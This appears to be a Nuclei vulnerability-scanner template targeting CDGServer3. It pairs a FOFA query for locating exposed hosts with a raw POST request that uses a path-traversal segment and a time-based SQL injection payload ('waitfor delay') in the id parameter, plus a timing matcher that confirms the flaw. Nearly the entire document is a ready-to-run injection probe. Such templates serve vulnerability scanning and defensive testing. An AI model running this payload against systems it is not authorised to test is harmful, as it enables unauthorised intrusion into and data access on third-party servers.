id: CDGServer3-SQL

info:
  name: CDGServer3-SQL
  author: lengmo
  severity: high
  description: CDGServer3-SQL
  tags: sqli
  metadata:
    fofa-qeury: body="/CDGServer3/index.jsp"


    veified: true
    max-request: 1

http:
  - raw:
      - |
        POST /CDGServer3/js/../NavigationAjax HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
 
        command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

               
    matchers:     
      - type: dsl
        dsl:
          - "status_code == 200 && duration>=5 && duration<=10 && contains(header,'text/xml')" 